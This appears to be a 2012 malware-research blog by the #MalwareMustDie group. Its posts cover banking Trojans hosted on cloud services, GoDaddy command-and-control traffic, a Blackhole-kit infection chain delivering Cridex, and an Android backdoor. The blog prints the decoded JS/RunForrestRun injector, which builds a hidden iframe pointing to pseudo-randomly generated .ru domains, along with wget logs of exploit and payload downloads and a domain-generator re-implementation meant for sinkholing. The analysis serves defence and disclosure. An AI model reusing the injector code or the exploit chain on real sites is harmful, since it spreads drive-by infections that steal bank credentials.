Monday, October 29, 2012

The crusaders' note : When #malware infector goes to Cloud - Part 2 : Amazon-AWS loaded with Trojan Bank Spy/Downloaders

Amazon AWS, a well-known cloud service, is loaded with Trojan banking malware, found uploaded through user accounts such as: junormario, flashssa, twttreng, etc.
Infection dates run from October 27th to now, and these infection links are already found in spam emails, meaning this is an ongoing scheme in the wild. These Trojans were found via direct download links/URLs or via an IFRAME pattern. Moreover, most of the infected downloads are served over HTTPS..
A case-by-case analysis is obviously not needed for these infections, since the VT analysis explains all the details correctly. We share this really hoping and expecting the cleanup to be conducted soon...
Below is the infection disclosure:
h00ps:// VT(31/43)
h00ps://  VT(31/44)
h00ps:// VT(34/44)
h00ps:// VT(28/43)
h00ps:// VT(31/44)
h00ps:// Trojan/Downloader/Banload VT(31/44)


The crusaders' note : Suspected JS/RunForrestRun aka PseudoRandom's NEW bad actor scheme is on going..

Following the previous blog posts on the PseudoRandom or JS/RunForrestRun infector, in this crusade we found that a new bad actor's scheme is spreading new infections using this malicious randomised obfuscation infector.
We released the details in our pastebin here: --->>[PASTEBIN], and will summarize the details as follows:
NEW infectors have been popping up since Oct 26th, as per the URLs below:


The decoded PseudoRandom, recovered from the hexed form, is as per below (the braces and line breaks lost in extraction are restored; the dropped call in createRandomNumber and the iframe style property names are marked in comments):
function nextRandomNumber(){
  var hi = this.seed / this.Q;
  var lo = this.seed % this.Q;
  var test = this.A * lo - this.R * hi;
  if (test > 0){
    this.seed = test;
  } else {
    this.seed = test + this.M;
  }
  return (this.seed * this.oneOverM);
}
function RandomNumberGenerator(unix){
  var d = new Date(unix * 1000);
  var s = d.getHours() > 12 ? 1 : 0;
  // seed depends only on month, day of month and AM/PM of the victim's local clock
  this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
  this.A = 48271;
  this.M = 2147483647;
  this.Q = this.M / this.A;
  this.R = this.M % this.A;
  this.oneOverM = 1.0 / this.M;
  this.next = nextRandomNumber;
  return this;
}
function createRandomNumber(r, Min, Max){
  // r.next() restored: the generator call between "*" and "+ Min" was dropped in extraction
  return Math.round((Max - Min) * r.next() + Min);
}
function generatePseudoRandomString(unix, length, zone){
  var rand = new RandomNumberGenerator(unix);
  var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o'
  , 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
  var str = '';
  for (var i = 0; i < length; i ++ ){
    str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  }
  return str + '.' + zone;
}
setTimeout(function (){
  try {
    if (typeof iframeWasCreated == "undefined"){
      iframeWasCreated = true;
      var unix = Math.round( + new Date() / 1000);
      var domainName = generatePseudoRandomString(unix, 16, 'ru');
      ifrm = document.createElement("IFRAME");
      ifrm.setAttribute("src", "h00p://" + domainName + "/runforestrun?sid=botnet2");
      /* three style properties of ifrm are set here to "0px", "0px" and "hidden";
         the property names did not survive extraction */
    }
  } catch (e){
  }
}, 500);
All URLs were extracted as per the snips below; the complete URL list is pasted here:--->>[PASTEBIN]
Sat Dec 31 19:00:01 EST 2011-
Sun Jan 1 07:30:00 EST 2012-
Sun Jan 1 19:59:59 EST 2012-
Mon Jan 2 08:29:58 EST 2012-
Mon Jan 2 20:59:57 EST 2012-
Tue Jan 3 09:29:56 EST 2012-
Tue Jan 3 21:59:55 EST 2012-
Wed Jan 4 10:29:54 EST 2012-
Wed Jan 4 22:59:53 EST 2012-
Thu Jan 5 11:29:52 EST 2012-
Thu Jan 5 23:59:51 EST 2012-
Fri Jan 6 12:29:50 EST 2012-
Sat Jan 7 00:59:49 EST 2012-
Sat Jan 7 13:29:48 EST 2012-
(and so on...)
The morals of these findings are:
1. This time PseudoRandom yields not just domains BUT full infected URLs.
2. Double or maybe triple obfuscation was found in the recent PseudoRandom landing HTML.

#MalwareMustDie! (Special thanks to EO for great crack!!)

The crusaders' note: Found the CNC of TrojDownloader/Backdoor/Spy in GoDaddy

We know GoDaddy is quite popular as a victim host of infectors, but this time we found a rare case showing hard proof that GoDaddy is being used as the CNC server of a Trojan which downloads other stuff, implements a backdoor, and spies/sends information to the CNC.
It is well written up in our pastebin here:--->>[PASTEBIN] so I'm not going to repeat it here, but I pasted below the GoDaddy CNC PoC only:
//CNC Remote Access:
Port: TCP/1433
Protocol: Unknown

NetRange: -
OriginAS:       AS26496
NetName:        GO-DADDY-COM-LLC
   Registered through:
      Created on: 24-May-11
      Expires on: 24-May-21
      Last Updated on: 20-Jun-11

//Communication Details↓

Data sent:
1201 0034 0000 0000 0000 1500 0601 001b    ...4............
0001 0200 1c00 0c03 0028 0004 ff08 0001    .........(......
5500 0000 4d53 5351 4c53 6572 7665 7200    U...MSSQLServer.
b004 0000                                  ....
Data received:
0401 0025 0000 0100 0000 1500 0601 001b    ...%............
0001 0200 1c00 0103 001d 0000 ff0a 3210    ..............2.
a700 0000 00                               .....
Data received:
0401 0025 0000 0100 0000 1500 0601 001b    ...%............
0001 0200 1c00 0103 001d 0000 ff0a 3210    ..............2.
a700 0000 00                               .....
Data sent:
1201 004e 0000 0000 1603 0100 4101 0000    ...N........A...
3d03 014d 6ed2 fa41 7a79 d17f 599e 3b32    =..Mn..Azy..Y.;2
9aea 9e90 f45a 4818 b6e7 bf80 ff67 1be2    .....ZH......g..
3c4c 2e00 0016 0004 0005 000a 0009 0064    <L.............d
0062 0003 0006 0013 0012 0063 0100         .b.........c..
Data received:
1201 0262 0000 0000 1603 0102 5502 0000    ...b........U...
4603 0150 8ada 9c4c ffea 4ba0 be32 bd85    F..P...L..K..2..
7120 3126 edce 653b dba6 1437 a061 8fba    q 1&..e;...7.a..
c2d6 2420 7c2a 0000 da01 e188 e247 4e70    ..$ |*.......GNp
82a0 da01 de9a a672 dca9 34c6 c756 3ac9    .......r..4..V:.
5ce0 c2e6 0005 000b 0002 0300 0200 0001    \...............
fd30 8201 f930 8201 62a0 0302 0102 0210    .0...0..b.......
3fd7 0913 e161 b0b0 4a0c 5d54 1ee0 57a4    ?....a..J.]T..W.
300d 0609 2a86 4886 f70d 0101 0505 0030    0...*.H........0
3b31 3930 3706 0355 0403 1e30 0053 0053    ;1907..U...0.S.S
004c 005f 0053 0065 006c 0066 005f 0053    .L._.S.e.l.f._.S
0069 0067 006e 0065 0064 005f 0046 0061    .i.g.n.e.d._.F.a
006c 006c 0062 0061 0063 006b 301e 170d    .l.l.b.a.c.k0...
3132 3130 3132 3037 3430 3234 5a17 0d34    121012074024Z..4
3231 3031 3230 3734 3032 345a 303b 3139    21012074024Z0;19
3037 0603 5504 031e 3000 5300 5300 4c00    07..U...0.S.S.L.
5f00 5300 6500 6c00 6600 5f00 5300 6900    _.S.e.l.f._.S.i.
6700 6e00 6500 6400 5f00 4600 6100 6c00    g.n.e.d._.F.a.l.
6c00 6200 6100 6300 6b30 819f 300d 0609    l.b.a.c.k0..0...
2a86 4886 f70d 0101 0105 0003 818d 0030    *.H............0
8189 0281 8100 b723 bf01 a2c2 4948 6867    .......#....IHhg
4013 9a8f 60df 5931 0079 ab9d 86ec faae    @...`.Y1.y......
6a29 ca24 310a 9503 49c5 1a68 fba7 6e27    j).$1...I..h..n'
0194 806c 984c 7d9f d9a7 bf1b 4a21 2ac4    ...l.L}.....J!*.
f991 15d0 78ec 3616 3fbd 2e29 284b 4fe6    ....x.6.?..)(KO.
95d9 1652 c074 bfef 7011 f49c f298 d049    ...R.t..p......I
3644 83fc 6b45 c073 33c4 11d2 c643 5c54    6D..kE.s3....C\T
366d bed7 1f32 95e0 66af 1b5a 1705 44df    6m...2..f..Z..D.
e2dd bbdd 4a5b 0203 0100 0130 0d06 092a    ....J[.....0...*
8648 86f7 0d01 0105 0500 0381 8100 3fb9    .H............?.
2a04 9d21 a08b 246d 50b5 c6fa f43c 2068    *..!..$mP....< h
06b4 1fe8 8d87 63d9 db8c e26a 0350 1b4e    ......c....j.P.N
43f6 0028 d949 509b 40f7 45fd 1704 77ff    C..(.IP.@.E...w.
43ac 7691 9e3e 904e 2865 383e 92d4 36f2    C.v..>.N(e8>..6.
f288 a1c1 17de fe1a d802 5845 5441 84a0    ..........XETA..
2a44 ccc1 3255 73fa 5a1b 00b4 1a5d 99e6    *D..2Us.Z....]..
9f70 e7bf 180a e038 3b8d d062 529e 1454    .p.....8;..bR..T
47af e431 03ba e29b 4427 655e 604f 0e00    G..1....D'e^`O..
0000                                       ..
Data sent:
1201 00c2 0000 0000 1603 0100 8610 0000    ................
8200 80b3 d498 e24c 1dc7 f64f 3936 9003    .......L...O96..
39d8 b500 6b69 b224 8f6f c28c 2a3b 239f    9...ki.$.o..*;#.
2a58 c8df 5e25 2152 d16d e2e5 0734 8428    *X..^%!R.m...4.(
d297 2ef1 debe 114d 5a1e 0831 168f 26ce    .......MZ..1..&.
f3c9 3d51 d3a2 1e8b ccf2 a795 ccef de18    ..=Q............
bc05 c33c 533b a4d5 30ba f192 18e8 4699    ...<S;..0.....F.
91fd 601a 74df 2f1d 7db2 095f 9964 ef04    ..`.t./.}.._.d..
5606 3231 8a02 9fa7 37f5 90d2 ea8f bb68    V.21....7......h
3a39 6414 0301 0001 0116 0301 0024 b7cd    :9d..........$..
6104 1932 a285 637a e79e fd73 42bb df15    a..2..cz...sB...
b6d2 7ae9 5b4d 878b a986 c41d 059e 5e83    ..z.[M........^.
7486                                       t.
Data received:
1201 0037 0000 0000 1403 0100 0101 1603    ...7............
0100 2409 770c ced7 501f 2755 01f9 2a55    ..$.w...P.'U..*U
d935 2976 c9f4 4614 0b0e 908a cc33 bae1    .5)v..F......3..
51d0 5b6c 6963 79                          Q.[licy
Data received:
0000 0000 0000                             ......
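The report leaves the protocol as unknown, but TCP/1433 is SQL Server's default port and the bytes above follow TDS (Tabular Data Stream) framing: an 8-byte header, then for packet type 0x12 a PRELOGIN option table, and after that the TLS handshake SQL Server uses to encrypt the login. The following decoder is an added example (not from the blog or its pastebin; the function names are mine) that runs over the first three packets transcribed from the dump, and assumes Node.js for Buffer.

```javascript
// Added example: decode the first packets of the TCP/1433 exchange above.
// Packets are transcribed from the dump; the third is cut to its first 16 bytes.

const TDS_TYPES = { 0x04: 'TABULAR RESULT (server reply)', 0x12: 'PRELOGIN' };
const PRELOGIN_OPTS = { 0: 'VERSION', 1: 'ENCRYPTION', 2: 'INSTOPT', 3: 'THREADID', 4: 'MARS' };
const ENCRYPT = { 0: 'ENCRYPT_OFF (login packet only)', 1: 'ENCRYPT_ON',
                  2: 'ENCRYPT_NOT_SUP', 3: 'ENCRYPT_REQ' };

function hex(s) { return Buffer.from(s.replace(/\s+/g, ''), 'hex'); }

// Client -> server PRELOGIN (52 bytes), server -> client reply (37 bytes),
// and the start of the client's next packet, which carries a TLS record.
const CLIENT_PRELOGIN = hex(
  '1201 0034 0000 0000 0000 1500 0601 001b 0001 0200 1c00 0c03 0028 0004 ff08 0001' +
  '5500 0000 4d53 5351 4c53 6572 7665 7200 b004 0000');
const SERVER_PRELOGIN = hex(
  '0401 0025 0000 0100 0000 1500 0601 001b 0001 0200 1c00 0103 001d 0000 ff0a 3210' +
  'a700 0000 00');
const CLIENT_TLS_START = hex('1201 004e 0000 0000 1603 0100 4101 0000'); // 16 of 78 bytes

// 8-byte TDS header: type, status, length (BE), spid (BE), packet id, window.
function parseHeader(buf) {
  if (buf.length < 8) throw new Error('short TDS header');
  const length = buf.readUInt16BE(2);
  return {
    type: buf[0], typeName: TDS_TYPES[buf[0]] || 'unknown',
    status: buf[1], length, spid: buf.readUInt16BE(4),
    packetId: buf[6], window: buf[7],
    truncated: buf.length < length,      // capture shorter than the header claims
    payload: buf.subarray(8),
  };
}

// VERSION option: major, minor, then a 2-byte build number.
function versionString(b) { return `${b[0]}.${b[1]}.${b.readUInt16BE(2)}`; }

// PRELOGIN payload: 5-byte entries (token, offset BE, length BE) ending in 0xff,
// each pointing into the same payload. Offsets are bounds-checked so a
// malformed table cannot read past the buffer.
function parsePrelogin(payload) {
  const out = {};
  for (let i = 0; payload[i] !== 0xff; i += 5) {
    if (i + 5 > payload.length) throw new Error('option table overruns payload');
    const token = payload[i];
    const off = payload.readUInt16BE(i + 1), len = payload.readUInt16BE(i + 3);
    if (off + len > payload.length) throw new Error(`option ${token} points past payload`);
    const data = payload.subarray(off, off + len);
    switch (PRELOGIN_OPTS[token]) {
      case 'VERSION':    out.version = len >= 4 ? versionString(data) : data.toString('hex'); break;
      case 'ENCRYPTION': out.encryption = len ? (ENCRYPT[data[0]] || `0x${data[0].toString(16)}`) : null; break;
      case 'INSTOPT':    out.instance = data.toString('latin1').split('\0')[0]; break;
      case 'THREADID':   out.threadId = len === 4 ? data.readUInt32LE(0) : null; break;
      default:           out[`opt${token}`] = data.toString('hex');
    }
  }
  return out;
}

// Classify one packet: a PRELOGIN option table, or a TLS record tunnelled in a
// PRELOGIN-type packet (that is how SQL Server encrypts the login exchange).
function describePacket(buf) {
  const { payload, ...header } = parseHeader(buf);
  if (payload.length >= 5 && payload[0] === 0x16 && payload[1] === 0x03) {
    return { ...header, tls: { contentType: 'handshake',
      version: `${payload[1]}.${payload[2]}`, recordLength: payload.readUInt16BE(3) } };
  }
  return { ...header, prelogin: parsePrelogin(payload) };
}

function summarize(buf) {
  const d = describePacket(buf);
  return d.tls
    ? `${d.typeName} len=${d.length}: TLS ${d.tls.contentType} v${d.tls.version} (${d.tls.recordLength} bytes)`
    : `${d.typeName} len=${d.length}: ${JSON.stringify(d.prelogin)}`;
}
```

Run over the three packets it reports the client's instance name "MSSQLServer", the server's version 10.50.4263 with encryption negotiated as ENCRYPT_OFF, and the TLS 3.1 (TLS 1.0) ClientHello that follows.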

Hope this report will make GoDaddy clean up the CNC soon.


The crusaders' note : New BHEK2 actor spreads Zbot P2P sets

Coming home after a full week of work travel put me in the mood to decode malware. I rested a while and went straight to start the crusade in #MalwareMustDie.
This weekend we found many interesting things; one of them is as per this title.
Most of the details are already written up in our pastebin here:--->>[PASTEBIN]
Please see the pastebin data before you continue.
So this blog is about the conclusion, as below:
1. This time BHEK2 was used to spread the Zbot P2P version/GameOver.
2. BHEK2 was used to drop the Trojan front infector of this Zbot scheme.
3. This Zbot does everything: calling the mothership, sending data, downloading the other sets & dropping itself.
4. See the network traffic in the pastebin: it contacts some sites
   and downloads the rest of it.
5. The jar and PDF are not the main components of this infection.

Below are snapshots we shared of this investigation in Twitter:

Initial traffic PCAP while contacting the mothership..

The overall analysis snapshots (bins, captures) as PoC...

The funny stuff during sniffing CNC traffic:

Non nobis Domine, non nobis, sed nomini tuo da Gloriam!

#MalwareMustDie (Special thanks for the great ninja sniper who hinted us this)

Monday, October 22, 2012

(Updated) A tale of mass infection of BHEK2 "border.htm" during ddos storm - Changes in JAR detected - Payload : Cridex - Malware Crusaders Logs

This post is dedicated to the wonderful individuals from varied countries and cultures who gathered together to push malware infection down to the very minimum level by aggressively researching new infections during their rest/private time on weekends. This is the story of #MalwareMustDie, the malware crusaders, with its team work report:

It is a quicky, and since the bad guys are also monitoring us now, I'll make it short. We found a new update of BHEK2 trends. In the past 2 days, during a DDoS storm, NEW infections of these landing pages appeared: a large number of infected border.htm files has been spotted everywhere. The storm made us slow in detecting these; by the time we found it the infection had already spread deep, and it was at that time we decided to end the last crusade. So this is the last battle's report:

With some formula we can grab all samples w/o problems:
--23:12:50--  h00p://
           => `column.php'
Connecting to||:8080... connected.
HTTP request sent, awaiting response... 200 OK
HTTP/1.0 200 OK
Server: nginx/1.0.10
Date: Sun, 21 Oct 2012 14:08:38 GMT
Content-Type: text/html; charset=CP-1251
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Vary: Accept-Encoding
Via: 1.0 localhost (squid/3.1.6)
Proxy-Connection: close
Length: unspecified [text/html]
23:12:53 (49.74 KB/s) - `column.php' saved [28835]
File looks like:
$ ls -alF column.php
-rwx------   1 malware mustdie    28835 Oct 21 05:12 column.php*
The data itself contains malc0de as per the snips below:
<html><head><title></title></head><body><div dqa="
2c6h6h#354860695" 57="96268+37586h5f5c%245829612a)
58&2a5a5" 8="362595768$24511g2c1g(281g2c1g28@1g2c1
43d3b32!3b3331322c^292e322c3e_2" 16="725256f@5f5c2
 if(r){s=s+r;}else break;
With the hexed complete data is here:--->>[PASTEBIN]
As usual it can be deobfs into PluginDetect here:--->>[PASTEBIN]
Which can alternatively be decoded manually like this:---->>[PASTEBIN]

Shortly, this border.htm infection case is using the same PluginDetect, with an infection of Cridex
(we thought it was Zbot), with the below steps:

1. Leads to h00p://secondhand4u[.]ru:8080/forum/links/column[.]php
2. Using function (c, b, a) + catching these parameters for Exploits = {d,f,h,m,i,e}
3. Makes you download the exploit PDF (CVE-2010-0188) & jar component. The jar exploits CVE-2012-0507, flooding AtomicReferenceArray & using a cracked singleton method to bypass the JRE environment (using IllegalArgumentException, SecurityException, InstantiationException, etc.) and pushes a URL download command to download a Trojan dropper. Our PoC during analysis of the jar code is as snipped below:
IMPORTANT NOTE: This Jar infection marks the first time the BHEK authors have used two forms of obfuscation in the param value field.
The full details of the decoded JAR are here:-->>[MMDCrackTeamBlog] Through the PDF & JAR exploits, the trojan/dropper is downloaded "via" URLs of the forms below:
(there's a direct download link too but sorry we're not going to expose it here..)

Not only PDF/JAR: PluginDetect will hit you with CVE-2006-0003 (MDAC) w/ ActiveX Object: BD96C556-65A3-11D0-983A-00C04FC29E36 to drop the trojan malware via msxml2.XMLHTTP to your PC with API: SaveToFile .//..//SOMETHING.exe). As you can see, a triple-hit exploit, to the same Cridex payload.

4. ↑That PDF and Jar file we posted in VT are as per the VT details below:

5. You will get exploited by the above details & brought to the saved Trojan exe file, as per the below PoC:
--01:04:06--  h00p://
           => `column.php@sgvdom=0404070908&ggwkc=3307093738070736060b&xbpknd=03
Connecting to||:8080... connected.
HTTP request sent, awaiting response... 200 OK
HTTP/1.0 200 OK
Server: nginx/1.0.10
Date: Sun, 21 Oct 2012 22:43:38 GMT
Content-Type: application/x-msdownload
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Pragma: public
Expires: Sun, 21 Oct 2012 14:22:22 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 87040
Connection: close
Length: 87,040 (85K) [application/x-msdownload]
100%[====================================>] 87,040       108.56K/s
01:04:10 (108.42 KB/s) - `calc.exe' saved [87040/87040]

VT shows:

MD5: 8e4e7c4bb9908a9488a1be96c5eb230f File size: 85.0 KB ( 87040 bytes ) File name: calc.exe File type: Win32 EXE Tags: peexe Detection: 29 / 43 Date: 2012-10-21 15:17:14 UTC ( 55 分 ago ) URL:

6. Dropped/Self-copied Trojan:
It dropped itself and saved it in the %AppData% folder.
Dropper & memory-inject API / reversing + behavior PoC:

(1) PID: 0x4ac 
File: C:\calc.exe 
Address: 0x4079ce 
   lpExistingFileName: "C:\calc.exe", 
   lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe", 
   bFailIfExists: 0x0);
(2) PID: 0x674 
File: C:\Documents and Settings\User\Application Data\KB00085031.exe" 
Address:   0x403822 
   (hProcess: 0x78, 
   lpThreadAttributes: 0x0, 
   dwStackSize: 0x0, 
   lpStartAddress: 0xe5eca0, 
   lpParameter: 0xe50000, 
   dwCreationFlags: 0x0, 
   lpThreadId: 0x0);
PS: the original PE sample also self-deleted.

The dropped Trojan (payload) is:

MD5: e86d8403f74bd18de027996abae4156a File size: 84.5 KB ( 86528 bytes ) File name: KB01428194.exe File type: Win32 EXE Tags: peexe Detection: 9 / 43 Date: 2012-10-21 14:48:59 UTC ( 1 時間, 26 分 ago ) URL:

According to the new "Behavioural Information" feature of VT, this payload Trojan did:

Written files...
  C:\DOCUME~1\~1\LOCALS~1\Temp\exp1.tmp.bat (successful)

Copied files...
  SRC: C:\4481dc0cc0fd454ecbbbc9329b1c9da4a875078a3b0693f77ad4e6deea72d1fb
  DST: C:\Documents and Settings\\Application Data\KB00927107.exe (successful)

Deleted files...
  C:\4481dc0cc0fd454ecbbbc9329b1c9da4a875078a3b0693f77ad4e6deea72d1fb (successful)
  C:\DOCUME~1\~1\LOCALS~1\Temp\exp1.tmp.bat (successful)

Created processes...
  C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\~1\LOCALS~1\Temp\exp1.tmp.bat"" (successful)
  C:\Documents and Settings\\Application Data\KB00927107.exe (successful)

Code injections in the following processes...
  python.exe (successful)
  VBoxTray.exe (successful)
We just finished the full behavior test of the dropped Trojan, PoC:

7. The network analysis can be seen here:--->>[PASTEBIN]
With the summary as per below:
7.1. It requested handshakes to 3 (three) remote IPs: and // I tried this 5 times, same pattern.. no miss..
7.2. It established a connection with
7.3. Sends POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 containing encrypted content.
7.4. See below for the sample of each unique packet we trapped (suspected encrypted credentials on outgoing packets).
8. The registry analysis can be seen here: --->>[PASTEBIN] With the summary as per below:
8.1. Autorun of the dropped Trojan.
8.2. Cannot expose further yet, but many ciphers are registered.
8.3. Suspected screenshot templates detected:
..\WinPos1024x768(1).left: 0x000000C0
..\WinPos1024x768(1).left: 0x0000006E
..\WinPos1024x768(1).top: 0x00000027
..\WinPos1024x768(1).top: 0x0000008A
..\WinPos1024x768(1).right: 0x000003E0
..\WinPos1024x768(1).right: 0x0000038E
..\WinPos1024x768(1).bottom: 0x0000027F
..\WinPos1024x768(1).bottom: 0x000002E2
9. The CNC was solved as per this report:--->>[PASTEBIN] by our member :-)
(additional) According to Contagio it is a Cridex: (thanks to @snowfl0w)

As the trophy of the current findings, the heads of these malwares are in the family pic below :-)

We were also asked by researchers for samples of the current infections.
Contagio looks busy, so you can download here:--->>[SAMPLE-SET]
(Mention us on Twitter for the password)

Cridex References:
M86 - The Cridex Trojan Targets 137 Financial Organizations in One Go
Stop Malvertising - Analysis of Cridex
DeepEnd Research - Blackhole & Cridex: Se2 Ep1: Intuit Spam & SSL traffic analysis
Contagio - Cridex Analysis using Volatility - by Andre' DiMino
Kahu Security - Spear-Phish Leads to Cridex
#MalwareMustDie!

Friday, October 19, 2012

Decoding Multilayer JavaScript Packed Deobfuscation Code - Daily Log of Malware Crusaders..

We are following an infection case that hit Japan, recently announced in the blog-->>[CASE: OCJP-074]. I don't think we are "that bad" at decoding JavaScript obfuscation, but I am telling you it can become a headache sometimes. In this case we are describing a not-so-easy-to-crack malware obfuscation code which, after being obfuscated, was also packed with JavaScript packer tools, and then obfuscated again and injected into the infected index.html.
[DISCLAIMER] This is the team work result of #MalwareMustDie; for security reasons we are not going to expose their names, yet all of the credit goes to the two terrific decoders in our team. The material written in this blog DOES NOT CONTAIN malicious code; however, for proving the theory, these malware codes may cause damage if you're not careful, so for those who want to learn and try, do it at your own risk.
Details are as follows:

The infected code is snipped like below:
The original code is as per this pastebin RAW here-->>[PASTEBIN1]. This code is easily deobfuscated into the following obfuscated code: ↑the neutralized one you can see in RAW here--->>[PASTEBIN2]. We tried to solve this several times and always got an undefined result, a garble of encoded characters, seemingly meaningless, i.e. like the result below:
  snip snip
Shortly: firstly, as always, we cracked the code. Secondly, to the malware coder, we have a message for you: "You are a lame coder!" And third, we are sharing the way to decode this with all Good People as follows:
1. The function function(p,a,c,k,e,r) is "unpacking" the 2nd parameter.
2. Replace eval with alert or prompt and that will eventually lead to the second layer of obfuscation as snipped below:
Original RAW is here--->>[PASTEBIN3]
3. Look at the last line as snipped below..
↑simply remove e(s); and replace it with alert(s);
4. Then you will get the snip of code below:
// Seems like another piece of Shit from Exploit Kit writers. :P
function nextRandomNumber(){
    var hi=this.seed/this.Q;
    var lo=this.seed%this.Q;
    var test=this.A*lo-this.R*hi;
function RandomNumberGenerator(unix){
    var d=new Date(unix*1000);
    var s=d.getHours()>12?1:0;
    return this

function createRandomNumber(r,Min,Max){
    return Math.round((Max-Min)*

function generatePseudoRandomString(unix,length,zone){
    var rand=new RandomNumberGenerator(unix);
    var letters=['a','b','c','d','e','f','g',
↑is our ol' friend PseudoRandom aka JS/RunForrestRun.
5. If you use our simulation tool for cracking PseudoRandom that we released in the previous post here---->>[Fuzzy In Cracking PseudoRandom], then you will get the domains represented by the pseudorandom domains from June/1/2012 through January/1/2014, as per the little snips below:
1338508801 -
1338517801 -
1338526801 -
1338535801 -
1338544801 -
1338553801 -
1338562801 -
1338571801 -
1338580801 -
1338589801 -
1338598801 -
1338607801 -
1338616801 -
1338625801 -
1338634801 -
1338643801 -
1338652801 -
1338661801 -
1338670801 -
1338679801 -
1338688801 -
1338697801 -
1338706801 -
1338715801 -
1338724801 -
1338733801 - 
   :                :
   :                :
↑the complete list is in the RAW here--->>[PASTEBIN4]
6. URLs for this month can be found by searching for unix times, as in the example below:
1349049601  OCTOBER-1-2012
1351728001  NOVEMBER-1-2012
7. We are asking the Good Guys to register these domains and SINKHOLE THEM ALL before they become weaponized by malware infections! End of story; hope our team effort is useful to prevent further infection and to suppress the malware growth to the very minimum level. The credit goes to two gentlemen who spent their resting time, despite hectic daily errands, doing a good deed to fight against malware! Support us by tweeting our beloved #hashtag below, and don't forget to visit our Google Groups site here--->>[LINK] for more tips :-) #MalwareMustDie!!
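The domain generator behind the decoded injector in the October 29 post and the cracking tool mentioned in step 5, re-implemented as an added example (not the blog's code nor the malware sample; the function names are mine) in the form a defender would use to enumerate the domains to register or sinkhole. It assumes Node.js and keeps the sample's float arithmetic so that it reproduces the malware's output.

```javascript
// Added example: re-implementation of the seed and letter-picking logic of the
// decoded JS/RunForrestRun ("PseudoRandom") injector, for blocklist generation.
//
// Two properties fall out of the original seed formula:
//   * it uses only month, day-of-month and an AM/PM flag (hour > 12), never the
//     year, so each calendar day yields the same pair of domains every year;
//   * it reads the victim's LOCAL clock, so one instant can map to different
//     domains in different time zones (the flip is at 13:00 local).
// The float arithmetic is kept exactly as in the malware (its Q is M/A as a
// float, not an integer), so this reproduces its output, not a textbook LCG.

const A = 48271;
const M = 2147483647;
const Q = M / A;            // float, as in the original
const R = M % A;
const ONE_OVER_M = 1.0 / M;
const LETTERS = 'abcdefghijklmnopqrstuvwxyz';

// Seed as computed by RandomNumberGenerator(unix) in the decoded sample.
function seedFor(month0, dayOfMonth, afternoon) {
  return 2345678901 + month0 * 0xFFFFFF + dayOfMonth * 0xFFFF +
         Math.round((afternoon ? 1 : 0) * 0xFFF);
}

// One call of nextRandomNumber(): returns the new seed and the value in (0, 1].
function step(seed) {
  const hi = seed / Q;
  const lo = seed % Q;
  const test = A * lo - R * hi;
  const next = test > 0 ? test : test + M;
  return [next, next * ONE_OVER_M];
}

// generatePseudoRandomString() for one (month, day, AM/PM) triple.
function domainFor(month0, dayOfMonth, afternoon, length = 16, zone = 'ru') {
  let seed = seedFor(month0, dayOfMonth, afternoon);
  let str = '';
  for (let i = 0; i < length; i++) {
    let v;
    [seed, v] = step(seed);
    str += LETTERS[Math.round((LETTERS.length - 1) * v)];  // createRandomNumber(r, 0, 25)
  }
  return str + '.' + zone;
}

// Domain for a unix timestamp. The malware uses the victim's local clock; pass
// the victim's UTC offset in hours to emulate that zone (0 = UTC).
function domainFromUnix(unix, tzOffsetHours = 0, zone = 'ru') {
  const d = new Date((unix + tzOffsetHours * 3600) * 1000);
  return domainFor(d.getUTCMonth(), d.getUTCDate(), d.getUTCHours() > 12, 16, zone);
}

// Every domain the generator can emit in a year: two per calendar day.
function yearBlocklist(year, zone = 'ru') {
  const out = new Set();
  for (let m = 0; m < 12; m++) {
    const daysInMonth = new Date(Date.UTC(year, m + 1, 0)).getUTCDate();
    for (let d = 1; d <= daysInMonth; d++) {
      out.add(domainFor(m, d, false, 16, zone));
      out.add(domainFor(m, d, true, 16, zone));
    }
  }
  return [...out].sort();
}
```

Because the year never enters the seed, yearBlocklist() for any one year already covers every domain the sample can ever produce for that TLD.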

Monday, October 15, 2012

Evil App: Russian FruitNinja - #Android Backdoor Analysis

This is a contribution from our #MalwareMustDie fellow researcher during his crusade against malware: research material on Android malware, complete from evil code analysis down to its crime aspect, which is linked to SMS fraud and more.
This post is also a cross post from (checkmate), done by Sanoop Thomas (@s4n7h0) from InR Labs of NII Consulting. All rights reserved to the author.
The research was well conducted and #MalwareMustDie checked its credibility; you will find it useful as reference research against similar threats.
So here we go..

For my research, I chose to analyze a popular Android application for malware. But why select a Russian version? Well, it made a compelling case study from an analysis perspective, as I later found out during my research. The application I selected was the popular game FruitNinja, downloaded from a Russian fake Android store (Figure 1).

Figure 1 : Russian Fake Android App Store

Steps for Analysis:

Note: Android Package (APK) is the file format used to distribute and install applications on Android phones. It is a zip archive/package based on the JAR file format which contains the certificates, assets, resources, manifest file, and Dalvik Executable (DEX) containing the actual program code.

On changing the APK extension to ZIP, I got the extracted archive as shown:

Figure 2 : APK Extracted

AndroidManifest.xml is the Android binary XML describing the name of the application, version, permission rights, and referenced library resources. To turn the file into a human-readable XML format, I used a python script for conversion.

Figure 3: Manifest Permission Audit

Here, the manifest auditing result reveals FruitNinja's permission for sending and receiving SMS, which was eye-catching at the very first glance. Also the resource folder (res) was quite interesting.

Figure 4 : Server-Side Polymorphism

A quick glance at the picture files reveals a common face in all pictures. So, who is that guy? Intrigued, I probed further using Google image search, resulting in a Russian meme character, the "Bestman from Fryazino". In the Russian context, Bestman is a term used as a reference to "witness".

Fryazino Story:

A leprosy user made a series of photos, including a witness from the groom's side who was at a wedding in the suburban town of Fryazino. In all of them the witness is depicted in the same posture with the same expression. The bestman's picture (black jacket & white pants) is replicated separately with Photoshop morphing onto a dark-contrast background. A Russian wiki says this guy's name is "Alex". But it doesn't make any sense for the analysis; rather it was just another piece of information. Nevertheless, this picture was found to be in many malwares.

